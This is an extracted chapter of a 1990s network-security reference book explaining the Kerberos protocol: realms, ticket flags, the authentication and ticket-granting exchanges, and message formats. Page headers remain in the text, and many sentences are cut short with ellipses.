Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

563

564

Part II: Gaining Access and Securing the Gateway

If an instance is a single component following the service name and the instance identifies the
host on which the server is running, then the name type SRV-HST should be used
...
If the
separate components of the host name appear as successive components following the name of
the service, then the name type SRVXHST should be used
...
500 names where the slash (/) might otherwise be ambiguous
...
When
comparing names, a name type of UNKNOWN matches principals authenticated with names
of any type
...


Name of Server Principals
The principal identifier for a server on a host generally is composed of the following two parts:
s The realm of the Key Distribution Center with which the server is registered
s A two-component name of type NT-SRV-HST if the host name is an Internet domain
name, or a multicomponent name of type NT-SRV-XHST if the name of the host is of a
form that permits slash (/) separators, such as X
...
Where the name of the host is not case-sensitive (for example, with
Internet domain names), the name of the host must be lowercase
...


Cross-Realm Operation
The Kerberos protocol is designed to operate across organizational boundaries
...
Each organization that wants to run a
Kerberos server establishes its own realm
...

By establishing inter-realm keys, the administrators of two realms can enable a client authenticated in the local realm to use its authentication remotely
...
For even small numbers of clients, however,
this becomes cumbersome, and more automatic methods are necessary
...
A client then can obtain a Ticket Granting

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

565

Kerberos

Ticket for the remote realm’s Ticket Granting Service from its local realm
...
It thereby can be certain that it was issued by the client’s own Ticket Granting Server
...

A realm is said to communicate with another realm if the two realms share an inter-realm key
or if the local realm shares an inter-realm key with an intermediate realm that communicates
with the remote realm
...

Realms typically are organized hierarchically
...
If an inter-realm key is not directly shared by two realms, the
hierarchical organization permits an authentication path to be constructed
...
If there is regular communication between two
realms that are not directly connected in the hierarchy, they can set up a direct key between
the two realms
...
3 shows a corporate hierarchy with the links between systems
representing a connection with a shared key
...
RESEARCH
...
COM and ProjectW
...
ABC
...
Any time a
connection will see significant data flows, an inter-realm key can be created and shared
between the servers
...
3

ABC
...

Production

ProjectW

Research

ProjectX

Accounting

Payroll

ProjectW

ProjectX

Although realms typically are hierarchical, intermediate realms can be bypassed to achieve
cross-realm authentication through alternative authentication paths
...
The end-service needs to
know which realms were transited when deciding how much faith to place in the authentication process
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

566

Part II: Gaining Access and Securing the Gateway

Ticket Flags
Each Kerberos ticket contains a set of bit flags that are used to indicate attributes of that ticket
...
Some are turned on and off
automatically by a Kerberos server as required
...

Table 9
...


Table 9
...


1

FORWARDABLE

This flag tells the Ticket Granting Server that it is OK
to issue a new Ticket Granting Ticket with a different
network address based on the presented ticket
...


3

PROXIABLE

The PROXIABLE flag has an interpretation identical
to that of the FORWARDABLE flag, except that the
PROXIABLE flag tells the Ticket Granting Server that
only non-Ticket Granting Tickets may be issued with
different network addresses
...


5

MAY-POSTDATE

This flag tells the Ticket Granting Server that a post
dated ticket may be issued based on this Ticket
Granting Ticket
...


7

INVALID

This flag indicates that a ticket must be validated
before use
...


9

INITIAL

This flag indicates that this ticket was issued using the
Authentication Server protocol, and not issued based
on a Ticket Granting Ticket
...


11

HW-AUTHENT

This flag indicates that the protocol employed for
initial authentication required the use of hardware
expected to be possessed solely by the named client
...


Initial and Preauthenticated Tickets
The INITIAL flag indicates that a ticket was issued using the Authentication Server protocol
and not issued based on a Ticket Granting Ticket
...
Thus, they are assured that the client’s key was
recently presented to the application client
...
Application servers must reject tickets that
have this flag set
...
Invalid tickets must be
validated by the Key Distribution Center before use, by presenting them to the Key Distribution Center in a Ticket Granting Server request with the VALIDATE option specified
...
Thus, the
validation is required so that postdated tickets that have been stolen before their start time can
be rendered permanently invalid using a hot-list mechanism
...
This can
expose their credentials to potential theft for equally long periods and those stolen credentials
would be valid until the expiration time of the ticket(s)
...

The solution to this problem is a renewable ticket
...
Renewable tickets have two expiration times
...
An application client must present a renewable ticket to the Key
Distribution Center before it expires
...
The Key Distribution Center issues a new ticket with a
new session key and a later expiration time
...
When the latest permissible expiration time arrives, the ticket expires
permanently
...
It refuses to renew such stolen
tickets, thereby reducing the usable lifetime of stolen tickets
...
Application servers usually can ignore it
...

If a renewable ticket is not renewed by its expiration time, the Key Distribution Center will
not renew the ticket
...
If it is set, then the
renew-till field in the ticket contains the time after which the ticket may not be renewed
...
Because
the application will run for longer than the local policy allows a single ticket to live, the
application will request a renewable ticket
...
This verifies that the
workstation controlling the simulation has not been listed as compromised
...
A batch submission
system, for example, would need tickets to be valid at the time the batch job is serviced
...
Postdated tickets provide a way to obtain these tickets from the
Key Distribution Center at job submission time, but to leave them dormant until they are
activated and validated by a further request of the Key Distribution Center
...

The MAY-POSTDATE flag in a ticket normally is interpreted only by the Ticket Granting
Service
...
This flag must be set in a Ticket Granting Ticket in
order to issue a postdated ticket based on the presented ticket
...
A client
can request it by setting the ALLOW-POSTDATE option in the KRB_AS_REQ message
...
Postdated
Ticket Granting Tickets can be obtained only by requesting the postdating in the
KRB_AS_REQ message
...
The Key Distribution Center can limit how far in the future a ticket may be postdated
...
The application server can
check the authtime field in the ticket to see when the original authentication occurred
...
When the Key Distribution Center issues a POSTDATED ticket, it
also is marked as INVALID, so that the application client must present the ticket to the Key
Distribution Center to be validated before use
...

The service must be able to take on the identity of the client, but only for a particular purpose
...

The PROXIABLE flag in a ticket normally is interpreted only by the Ticket Granting Service
...
When set, this flag gives the Ticket Granting Server the go
ahead to issue a new ticket (but not a Ticket Granting Ticket) with a different network address
based on this ticket
...
This flag enables a client to pass a proxy to a
server to perform a remote request on its behalf
...

To complicate the use of stolen credentials, Kerberos tickets usually are valid only from those
network addresses specifically included in the ticket
...
Therefore, a client that wants
to grant a proxy must request a new ticket valid for the network address of the service to be
granted the proxy
...

Application servers may check this flag and require additional authentication from the agent
before presenting the proxy in order to provide an audit trail
...
A user might log in to a remote system, for example, and
want authentication to work from that system as if the login were local
...
Application servers can ignore it
...
This flag is reset by default, but users can request that it be
set by setting the FORWARDABLE option in the Authentication Server request when they
request the initial Ticket Granting Ticket
...
If the flag is not set, then authentication forwarding is not
permitted
...

The FORWARDED flag is set by the Ticket Granting Server when a client presents a ticket
with the FORWARDABLE flag set and requests it be set by specifying the FORWARDED
Key Distribution Center option and supplying a set of addresses for the new ticket
...
Application servers
might want to process FORWARDED tickets differently from non-FORWARDED tickets
...
INITIAL, PREAUTHENT, and HW-AUTHENT are set at the time of authentication
...
This flag does not carry forward onto future tickets, so it serves to indicate that
this ticket was authenticated directly, which is useful for applications that require a specific
authentication prior to proceeding, such as the login or password changing programs
...
These tickets should be usable only by the legitimate user
...


Finally, the flag HW-AUTHENT indicates that the user was hardware authenticated
...
Applications dealing with particularly sensitive information or large
financial transactions might want to insist on a hardware authentication
...
The
RENEWABLE-OK option indicates that the client will accept a renewable ticket if a ticket
with the requested life cannot otherwise be provided
...
The value of the renew-till field still can be adjusted by sitedetermined limits or limits imposed by the individual principal or server
...
It indicates
that the to-be-issued ticket for the end server is to be encrypted in the session key from the
additional Ticket Granting Ticket provided with the request
...
The following sections
describe the interactions between network clients and servers and the messages involved in
those exchanges
...

When a ticket or authenticator is included in a protocol message, it is treated as an opaque
object
...
A ticket contains the following
information:
Ticket =

{
tkt-vno[0]
realm[1]
sname[2]
enc-part[3]

INTEGER,
Realm,
Principal Name,
EncryptdData

}
— Encrypted part of ticket
EncryptdData = {
flags[0]
Ticket Flags,
key[1]
EncryptionKey,
crealm[2]
Realm,
cname[3]
Principal Name,
transited[4]
Transited Encoding,
authtime[5]
KerberosTime,
starttime[6]
KerberosTime OPTIONAL,
endtime[7]
KerberosTime,
renew-till[8]
KerberosTime OPTIONAL,
caddr[9]
HostAddresses OPTIONAL,
authorization-data[10] AuthorizationData OPTIONAL
}
— encoded Transited field
TransitedEncoding = {
tr-type[0] INTEGER — must be registered
contents[1] BYTE STRING
}

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

571

572

Part II: Gaining Access and Securing the Gateway

The encoding of EncryptdData is encrypted in the key shared by Kerberos and the end server
(the server’s secret key)
...
2 describes the fields in the ticket
...
2
Ticket Field Descriptions
Field

Description

tkt-vno

Specifies the version number of the ticket
...
Also serves to identify the
realm part of the server’s principal identifier
...


sname

Specifies the name part of the server’s identity
...


flags

Indicates which of various options were used or requested when the
ticket was issued
...


crealm

Contains the name of the realm in which the client is registered and in
which initial authentication took place
...


transited

Lists the names of the Kerberos realms that took part in authenticating
the user to whom this ticket was issued
...

Serves as the time of issue for the original ticket on which this ticket is
based
...


starttime

Specifies the time after which the ticket is valid
...
If absent from the ticket, its
value should be treated as that of the authtime field
...
Individual services can place their own limits on the
life of a ticket and reject tickets that have not yet expired
...


renew-till

Indicates the maximum endtime that can be included in a renewal
...
Can be thought of as the absolute expiration time for the ticket,
including all renewals
...
If no addresses, the ticket can be used
from any location
...
They can
refuse to issue or accept such tickets
...
Because the session key is not sent over the
network in cleartext, credentials can’t be stolen simply by listening to
the network
...


authorization-data

Serves to pass authorization data from the principal on whose behalf a
ticket was issued to the application service
...
If no authorization data is included, it is left out
...
A client who wants to print a file, for example, can obtain a
file server proxy to be passed to the print server
...

The authorization-data field is optional and does not have to be
included in a ticket
...
The encoding is encrypted in the ticket’s session
key shared by the client and the server
...
3 describes the fields in the authenticator
...
3
Authenticator Field Descriptions
Field

Description

authenticator-vno

Specifies the version number for the format of the authenticator
...


cksum

Contains a checksum of the application data that accompanies the
KRB_AP_REQ
...
Often appears along with ctime, because the
two fields are used together to specify a reasonably accurate timestamp
...


subkey

Contains the client’s choice for an encryption key to be used to protect
this specific application session
...


seq-number
(optional)

Includes the initial sequence number to be used by the KRB_PRIV or
KRB_SAFE messages when sequence numbers are used to detect
replays
...
) When
included in the authenticator, this field specifies the initial sequence
number for messages from the client to the server
...
Incremented by one after each message
is sent when used in KRB_PRIV or KRB_SAFE messages
...
The
initial sequence number should be random and uniformly distributed
across the full space of possible sequence numbers, so an attacker
cannot guess it and successive sequence numbers do not repeat other
sequences
...
Optional, and appears only when
additional restrictions are placed on the use of a ticket
...
The client’s secret key is used for encryption
and decryption
...
This exchange also is
used to request credentials for services that must not be mediated through the Ticket Granting
Service, but rather require a principal’s secret key, such as the password-changing service
...
Otherwise, it would be possible for someone to walk
up to an unattended session and change another user’s password
...

To authenticate a user logging on to a local system, the credentials obtained in the Authentication Server exchange can first be used in a Ticket Granting Server exchange to obtain credentials for a local server
...


Note The exchange consists of two messages: KRB_AS_REQ from the client to Kerberos,
and KRB_AS_REP or KRB_ERROR in reply
...
The response, KRB_AS_REP, contains a ticket for the client
to present to the server, and a session key to be shared by the client and the server
...

The KRB_AS_REP message contains information that can be used to detect replays and
associate it with the message to which it replies
...
The error message is not
encrypted
...
The lack of encryption in the KRB_ERROR message
precludes the capability to detect replays or fabrications of such messages
...
It simply sends a reply without knowing or caring whether they are
the same—which is acceptable because nobody but the principal whose identity was given in
the request can use the reply
...
The
initial request supports an optional field that can be used to pass additional information that
might be needed for the initial exchange
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

575

576

Part II: Gaining Access and Securing the Gateway

Generation of KRB_AS_REQ Message
The client can specify a number of options in the initial request
...


Receipt of a KRB_AS_REQ Message
If all goes well, processing the KRB_AS_REQ message results in the creation of a ticket for the
client to present to the server
...
If required, the server
preauthenticates the request, and if the preauthentication check fails, an error message with the
code KDC_ERR_PREAUTH_FAILED is returned
...
Otherwise, it generates a random session key
...
This can only be achieved in a pseudo-random number
generator if it is based on cryptographic principles
...

If the requested start time is absent or indicates a time in the past, then the start time of
the ticket is set to the authentication server’s current time
...
The administrator might decide to prohibit
certain types or ranges of postdated tickets
...
The postdated ticket must be
validated before use by presenting it to the Key Distribution Center after the start time has
been reached
...
If the requested expiration time for the ticket exceeds what was determined as earlier,
and if the RENEWABLE-OK option was requested, then the RENEWABLE flag is set in the
new ticket, and the renew-till value is set as if the RENEWABLE option were requested
...
If the new ticket is postdated (the start time is in the
future), its INVALID flag also will be set
...
It copies the
addresses in the request into the caddr of the response, placing any required preauthentication
data into the padata of the response
...


Receipt of a KRB_AS_REP Message
If the reply message type is KRB_AS_REP, then the client verifies that the cname and crealm
fields in the cleartext portion of the reply match what it requested
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

577

578

Part II: Gaining Access and Securing the Gateway

The client uses its secret key to decrypt the encrypted part of the response and verifies that the
nonce in the encrypted part matches the nonce it supplied in its request (to detect replays)
...
It then stores the ticket, session key, start and expiration
times, and other information for later use
...
The client
program could then suggest remedial action, such as a password change
...
The user and an attacker could cooperate to generate a KRB_AS_REP format message
that decrypts properly but is not from the proper Key Distribution Center
...
If those credentials can be verified, then the
identity of the user can be assured
...


Receipt of a KRB_ERROR Message
If the reply message type is KRB_ERROR, then the client interprets it as an error and performs whatever application-specific tasks are necessary to recover
...
The server can be local or registered in a remote realm
...

The client must already have acquired a ticket for the Ticket Granting Service using the
Authentication Server exchange
...
The message format for the
Ticket Granting Service exchange is almost identical to that for the Authentication Server
exchange
...
Instead, the session key from the
Ticket Granting Ticket or renewable ticket, or subsession key from an Authenticator is used
...

After a renewable or Ticket Granting Ticket expires, the client must use a separate exchange to
obtain valid tickets
...


The KRB_TGS_REQ message includes information that authenticates the client, plus a
request for credentials
...
In the Ticket Granting Ticket and proxy cases, the request can include one or
more of the following:
s A list of network addresses
s A collection of typed authorization data to be sealed in the ticket for authorization use
by the application server, or additional tickets
The Ticket Granting Service reply (KRB_TGS_REP) contains the requested credentials,
encrypted in the session key from the Ticket Granting Ticket or renewable ticket, or if present,
in the subsession key from the Authenticator (part of the authentication header)
...
The
KRB_ERROR message is not encrypted
...
The
KRB_ERROR message also contains information that can be used to associate it with the
message to which it replies
...


Generation of KRB_TGS_REQ Message
Before sending a request to the Ticket Granting Service, the client must determine in which
realm the application server is registered, using one of several ways:
s It might be known beforehand (because the realm is part of the principal identifier)
...

s The information can be obtained from a configuration file
...
This might result in the use of a realm that has been
compromised, and would result in an attacker’s ability to compromise the authentication of
the application server to the client
...

If the client does not already possess a Ticket Granting Ticket for the appropriate realm, then
one must be obtained
...
The Kerberos server may return a Ticket
Granting Ticket for the desired realm
...
In this case, the client must
repeat this step using a Kerberos server in the realm specified in the returned Ticket Granting
Ticket
...
This request requires a Ticket Granting Ticket for the higher
realm that must be obtained by recursively applying these directions
...
RESEARCH
...
COM wants to use
services in PROJECTX
...
ABC
...
RESEARCH
...
COM for credentials
...
ABC
...
In turn, RESEARCH will return
credentials for ABC
...
ABC
...
Finally
he will get credentials for PROJECTX
...
ABC
...
Luckily for the user, this five
step process will all take place automatically
...
The list could be obtained through a
configuration file or network service
...

As in the Authentication Server exchange, the client may specify a number of options in the
KRB_TGS_REQ message
...

In preparing the authentication header, the client can select a subsession key under which the
response from the Kerberos server will be encrypted
...
If the subsession key is
not specified, the session key from the Ticket Granting Ticket is used
...

After the message is prepared, it is sent to a Kerberos server for the destination realm
...
However, there are many additional checks to be performed
...
Usually, it’s for the Ticket Granting Service and the Ticket

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

Kerberos

Granting Service’s key is used
...
If the accompanying ticket is for an application
server in the current realm, and the RENEW, VALIDATE, or PROXY options are specified in
the request, and the server for which a ticket is requested is the server named in the accompanying ticket, then the Key Distribution Center uses the key of the application server to decrypt
the ticket in the authentication header
...

After the accompanying ticket has been decrypted, the user-supplied checksum in the
Authenticator must be verified against the contents of the request
...
If the checksum type is not supported, the
KDC_ERR_SUMTYPE_NOSUPP error is returned
...

If any of the decryptions indicate failed integrity checks, the
KRB_AP_ERR_BAD_INTEGRITY error is returned
...
The Kerberos database is
queried to retrieve the record for the requested server, including the key with which the ticket
is to be encrypted
...
This is the only case in
which the response from the Key Distribution Center is for a different server than that
requested by the client
...
If the
transited field needs to be updated, but the transited type is not supported, the
KDC_ERR_TRTYPE_NOSUPP error is returned
...

s The end time from the Ticket Granting Ticket
...
The maximum life for
the requesting principal was already applied when the Ticket Granting Ticket was
issued
...
This option is honored only if the FORWARDABLE flag is
set in the Ticket Granting Ticket
...
The resulting ticket contains
the addresses specified by the client
...
The PROXY option is not honored on requests for additional Ticket
Granting Tickets
...
If it indicates a time in the future, but
the POSTDATED option has not been specified or the MAY-POSTDATE flag is not set in
the Ticket Granting Ticket, then the error KDC_ERR_CANNOT_POSTDATE is returned
...
If acceptable, the ticket’s start time is set as requested, and the INVALID flag is set
...
However, in no case may the start time, end time, or
renew-till time of a newly issued postdated ticket extend beyond the renew-till time of the
Ticket Granting Ticket
...
If the name of the requested server is missing from the request, the name of
the client in the additional ticket will be used
...
If the request succeeds, the session key from the additional ticket will be used to
encrypt the new ticket that is issued instead of using the key of the server for which the new
ticket will be used
...

If the RENEW option is requested, then the Key Distribution Center will verify that the
RENEWABLE flag is set in the ticket and that the renew_till time is still in the future
...
If the PROXY option is requested, then the Key Distribution Center will check that the PROXIABLE flag is set in the ticket
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

Kerberos

Whenever a request is made to the Ticket Granting Server, the presented ticket(s) is checked
against a hot-list of tickets that have been canceled
...
” If a presented ticket had an authtime in that
range, it would be rejected
...
Any normal ticket obtained before it was reported stolen will still be valid, but only
until the normal expiration time
...
It is not encrypted using the client’s secret key
...


Encoding the Transited Field
If the identity of the server in the Ticket Granting Ticket that is presented to the Key Distribution Center as part of the authentication header is that of the Ticket Granting Service, but
the Ticket Granting Ticket was issued from another realm, the Key Distribution Center looks
up the inter-realm key shared with that realm and uses that key to decrypt the ticket
...

The realm part of the client’s identity is taken from the Ticket Granting Ticket
...
This is accomplished by reading the transited field from the Ticket Granting Ticket,
adding the new realm to the set, then constructing and writing out its encoded (shorthand)
form
...

The Ticket Granting Service does not add the name of its own realm
...
This prevents a malicious Kerberos server from
intentionally leaving out its own name
...

The names of neither the local realm nor the principal’s realm are included in the transited
field
...
Because the endpoints are not included, both local and single-hop interrealm authentication result in an empty transited field
...
To
decrease the length of this field, its contents are encoded
...
500 style realm names
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

583

584

Part II: Gaining Access and Securing the Gateway

Receipt of a KRB_TGS_REP Message
After the client receives the KRB_TGS_REP, it processes it in the same manner as the
KRB_AS_REP processing described earlier
...


Specifications for the Authentication Server
and Ticket Granting Service Exchanges
This section specifies the format of the messages used in exchange between the client and the
Kerberos server
...

These options indicate the flags that the client wants set on the tickets, as well as other
information to modify the behavior of the Key Distribution Center
...

Where appropriate, the name of an option may be the same as the flag set by that option
...
Table 9
...


Table 9
...


1

FORWARDABLE

The FORWARDABLE option indicates that the ticket to
be issued is to have its forwardable flag set
...
This option indicates that this
is a request for forwarding
...


3

PROXIABLE

The PROXIABLE option indicates that the ticket to be
issued is to have its proxiable flag set
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

585

Kerberos

Bit(s)

Name

Description

4

PROXY

The PROXY option indicates that this is a request for a
proxy
...
The address(es) of the host from which the resulting
ticket is to be valid are included in the addresses field of
the request
...
It may only be set on the initial request, or if the
Ticket Granting Ticket on which it is based also has its
MAY-POSTDATE flag set
...
This option will only be honored if
the Ticket Granting Ticket on which it is based has its
MAY-POSTDATE flag set
...


7

UNUSED

This option is presently unused
...
It may only
be set on the initial request, or when the Ticket Granting
Ticket on which the request is based is also renewable
...


9–26

RESERVED

Reserved for future use
...
If a ticket with the
requested life cannot be provided, then a renewable ticket
may be issued with a renew-till equal to the requested end
time
...


28

ENC-TKT-IN-SKEY

This option is used only by the Ticket Granting Service
...
4, Continued
Key Distribution Center Options
Bit(s)

Name

Description
for the end server is to be encrypted in the session key
from the additional Ticket Granting Ticket provided
...


30

RENEW

The RENEW option indicates that the present request is
for a renewal
...
The ticket
to be renewed is passed in the padata field as part of the
authentication header
...

The VALIDATE option indicates that the request is to
validate a postdated ticket
...
A
ticket cannot be validated before its start time
...
Instead, its type is either
KRB_AS_REQ or KRB_TGS_REQ, depending on whether the request is for an initial ticket
or an additional ticket
...

The message fields are as follows:
AS-REQ = KDC-REQ
TGS-REQ = KDC-REQ
KDC-REQ = {
pvno[1]
msg-type[2]
padata[3]
req-body[4]

INTEGER,
INTEGER,
SEQUENCE OF PA-DATA OPTIONAL,
KDC-REQ-BODY

}
PA-DATA = {
padata-type[1]
padata-value[2]

INTEGER,
BYTE STRING,

}
— might be encoded AP-REQ

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

587

Kerberos

padata-type = PA-ENC-TIMESTAMP
padata-value = EncryptedData — PA-ENC-TS-ENC
PA-ENC-TS-ENC = {
patimestamp[0] KerberosTime, — client’s time
pausec[1]
INTEGER OPTIONAL
}

KDC-REQ-BODY = {
kdc-options[0] KDCOptions,
cname[1]
PrincipalName OPTIONAL,
— Used only in AS-REQ
realm[2]
Realm, — Server’s realm
— Also client’s in AS-REQ
sname[3]
PrincipalName OPTIONAL,
from[4]
KerberosTime OPTIONAL,
till[5]
KerberosTime,
rtime[6]
KerberosTime OPTIONAL,
nonce[7]
INTEGER,
etype[8]
SEQUENCE OF INTEGER, — EncryptionType,
— in preference order
addresses[9]
HostAddresses OPTIONAL,
enc-authorization-data[10]
EncryptedData OPTIONAL,
— Encrypted AuthorizationData encoding
additional-tickets[11]
SEQUENCE OF Ticket OPTIONAL

The fields in this message are described in table 9
...


Table 9
...


msg-type

Indicates the type of protocol message
...
Included to
make the identifier more readily accessible to the application
...


padata

Contains authentication information that may be needed before
credentials can be issued or decrypted
...

The checksum in the authenticator (which must be collisionproof) is to be computed over the KDC-REQ-BODY encoding
...
5, Continued
KRB_KDC_REQ Message Fields
Field

Description
In most requests for initial authentication and most replies, the
padata field is left out
...
It might be used, for example, to initially verify
the identity of a client before any response is returned
...


pausec

Contains the microseconds
...

Also contains information needed to help the KDC or the client
select the key needed for generating or decrypting the response,
useful for supporting the use of certain “smartcards” with
Kerberos
...
Negative values of padata-type are reserved for unregistered
use
...


req-body

Delimits the extent of the remaining fields
...


kdc-options

Appears in the KRB_AS_REQ and KRB_TGS_REQ requests to
the Key Distribution Center
...


cname and sname

Same as those described for the ticket
...
If absent, the
name of the server is taken from the name of the client in the
ticket passed as additional-tickets
...
It is encrypted under the sub-session key if
present in the Authenticator, or alternatively from the session key
in the Ticket Granting Ticket, both from the padata field in the
KRB_AP_REQ
...
In the
Authentication Server exchange, this is also the realm part of the
client’s principal identifier
...


till

Contains the expiration date requested by the client in a ticket
request
...


nonce

Part of the Key Distribution Center request and response
...
If the same number is
included in the encrypted response from the Key Distribution
Center, it provides evidence that the response is fresh and has not
been replayed by an attacker
...

Ideally it should be generated randomly, but if the correct time is
known, it may suffice
...


etype

Specifies the desired encryption algorithm to be used in the
response
...
Usually includes the addresses for the client’s host
...
The contents of this field
are usually copied by the Key Distribution Center into the caddr
field of the resulting ticket
...
If the ENC-TKT-IN-SKEY option has
been specified, then the session key from the additional ticket will
be used in place of the server’s key to encrypt the new ticket
...


The optional fields are included only if necessary to perform the operation specified in the kdcoptions field
...
The KRB_TGS_REQ message contains these fields, as does the authentication
header (KRB_AP_REQ) passed in the padata field
...
The message type is KRB_AS_REP or KRB_TGS_REP
...
For
KRB_AS_REP, the ciphertext is encrypted in the client’s secret key, and the client’s key
version number is included in the key version number for the encrypted data
...
In that case,
no version number is present in the EncryptedData sequence
...
6 describes the fields in this message
...
6
KRB_KDC_REP Message Fields
Field

Description

pvno and msg-type

Described earlier
...


padata

Described in detail earlier
...


ticket

The newly issued ticket
...


key

Same as described for the ticket
...
Depending on what information is
available, this might be the last time that a request for a Ticket
Granting Ticket was made, or the last time that a request based on a
Ticket Granting Ticket was successful
...
Some implementations may display
this information to the user to aid in discovering unauthorized use of
one’s identity
...


nonce

Described earlier
...


flags, authtime,
starttime, endtime,
renew-till, and caddr

All duplicates of those found in the encrypted portion of the attached
ticket
...
The client must already have acquired credentials for the
server using the Authentication Server or Ticket Granting Server exchange
...


The KRB_AP_REQ Message
The KRB_AP_REQ contains authentication information that should be part of the first
message in an authenticated transaction
...
The ticket by itself is insufficient to authenticate a client,
because tickets are passed across the network in cleartext
...
Tickets can be copied from one
message and replayed in another without any cryptographic skill
...
The KRB_AP_REQ message is referred to elsewhere
as the “authentication header
...
The client can reuse any tickets it holds until they expire
...

Authenticators may not be reused and are rejected if replayed to a server
...
In such
cases, a new Authenticator must be generated for each retry
...

The client can indicate a requirement of mutual authentication or the use of a session-key
based ticket by setting the appropriate flag(s) in the ap-options field of the message
...


Receipt of a KRB_AP_REQ Message
Authentication is based on the server’s current time of day (clocks must be loosely synchronized), the Authenticator, and the ticket
...
This message can be encapsulated in the application
protocol if its “raw” form is not acceptable to the protocol
...
If the message type is
not KRB_AP_REQ, the server returns the KRB_AP_ERR_MSG_TYPE error
...
If the USE-SESSION-KEY flag is set in the
ap-options field, it indicates to the server that the ticket is encrypted in the session key from
the server’s Ticket Granting Ticket rather than its secret key
...
The KRB_AP_ERR_NOKEY error code is returned if
the server doesn’t have the proper key to decipher the ticket
...

If the decryption routines detect a modification of the ticket, the
KRB_AP_ERR_BAD_INTEGRITY error is returned
...

The authenticator is decrypted using the session key extracted from the decrypted ticket
...
The name and realm of the client from the ticket are compared against the same
fields in the Authenticator
...

They might not match, for example, if the wrong session key was used to encrypt the Authenticator
...
If no match is found or the server insists on
ticket addresses when none are present in the ticket, the KRB_AP_ERR_BADADDR error is
returned
...
If the server name along
with the client name, time and microsecond fields from the Authenticator match any recently
seen such tuples, the KRB_AP_ERR_REPEAT error is returned
...

Other client principals communicating with the same server principal should not have their
Authenticators rejected if the time and microsecond fields happen to match some other client’s
authenticator
...
If a server loses track of any authenticator presented
within the allowable clock skew, it will reject all requests until the clock skew interval has
passed
...
If this is not done, an attacker could conceivably record the ticket and authenticator sent over the network to a server
...
If a sequence number is provided in the authenticator, the server saves it for later use in processing KRB_SAFE and/or KRB_PRIV messages
...

The server computes the age of the ticket: server time minus the start time inside the Ticket
...
Otherwise, if the current time is later than the end time by more than the allowable clock skew, the
KRB_AP_ERR_TKT_EXPIRED error is returned
...


Generation of a KRB_AP_REP Message
Typically, a client’s request includes both the authentication information and its initial request
in the same message
...
If mutual
authentication is being performed, however, the KRB_AP_REQ message will have MUTUALREQUIRED set in its ap-options field
...

As with the error message, this message can be encapsulated in the application protocol if its
raw form is unacceptable to the application’s protocol
...
If a sequence number is to be included, it should be chosen randomly, as
described earlier for the Authenticator
...
The KRB_AP_REP message is encrypted in the session key
extracted from the ticket
...
If they match, the
client is assured that the server is genuine
...


Using the Encryption Key
After the KRB_AP_REQ/KRB_AP_REP exchange has occurred, the client and server share
an encryption key that can be used by the application
...
In some cases,

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

595

Kerberos

the use of this session key is implicit in the protocol
...

With both the one-way and mutual authentication exchanges, the peers should take care not to
send sensitive information to each other without proper assurances
...
If an application protocol requires privacy of its messages, it can use the KRB_PRIV message
...


Client/Server (CS) Message Specifications
This section specifies the format of the messages used for the authentication of the client to the
application server
...
The KRB_AP_REQ message is often referred to as the authentication header
...
7 describes the fields in this message
...
7
KRB_AP_REQ Message Fields
Field

Description

pvno and msg-type

Described earlier
...


ap-options

Appears in the application request (KRB_AP_REQ) and affects the
way the request is processed
...
7, Continued
KRB_AP_REQ Message Fields
Field

Description
The USE-SESSION-KEY option indicates that the ticket the client
is presenting to a server is encrypted in the session key from the
server’s Ticket Granting Ticket
...

The MUTUAL-REQUIRED option tells the server that the client
requires mutual authentication, and that it must respond with a
KRB_AP_REP message
...


authenticator

Contains the authenticator, which includes the client’s choice of a
subkey
...
The message is sent in response to an application request
(KRB_AP_REQ) in which the mutual authentication option has been selected in the apoptions field
...
8 describes the fields in this message
...
8
KRB_AP_REP Message Fields
Field

Description

pvno and msg-typeq

Described earlier
...


enc-part

Described earlier
...


cusec

Contains the microsecond part of the client’s timestamp
...
Unless an application specifies otherwise, if this
field is left out, the subsession key from the authenticator is used
...


Error Message Reply
If an error occurs while processing the application request, the KRB_ERROR message is sent
in response
...
If the Authenticator was
decipherable, the ctime and cusec fields contain the values from it
...
It achieves this by including a keyed, collision-proof
checksum of the user data and some control information
...
Kerberos usually uses the last key negotiated via subkeys, or the session key if
no negotiation has occurred
...
The checksum algorithm should
be some sort of keyed one-way function such as the RSA-MD5-DES, or the DES-MAC,
generated using the subsession key if present, or otherwise the session key
...
Unkeyed or non-collision-proof
checksums are not suitable for this use
...
The control
information for the KRB_SAFE message includes a timestamp and a sequence number
...

Sequence numbers are useful when all messages sent will be received by one’s peer
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

597

598

Part II: Gaining Access and Securing the Gateway

If the application protocol is expected to tolerate lost messages without them being resent, the
use of the timestamp is the appropriate replay detection mechanism
...

After computing the checksum, the client then transmits the information and checksum to the
recipient
...
If any error
occurs, an error code is reported for use by the application
...
A mismatch generates a
KRB_AP_ERR_BADVERSION or KRB_AP_ERR_MSG_TYPE error
...
The recipient verifies that the
operating system’s report of the sender’s address matches the sender’s address in the message
...
A failed match for
either case generates a KRB_AP_ERR_BADADDR error
...

If timestamp and usec are expected and not present, or they are present but not current, the
KRB_AP_ERR_SKEW error is generated
...
If an incorrect sequence number is included, or
a sequence number is expected but not present, the KRB_AP_ERR_BADORDER error is
generated
...

Finally, the checksum is computed over the data and control information, and if it doesn’t
match the received checksum, a KRB_AP_ERR_MODIFIED error is generated
...


KRB_SAFE Message Specification
This section specifies the format of a message that can be used by either side, client or server,
of an application to send a tamperproof message to its peer
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

599

Kerberos

KRB_SAFE Definition
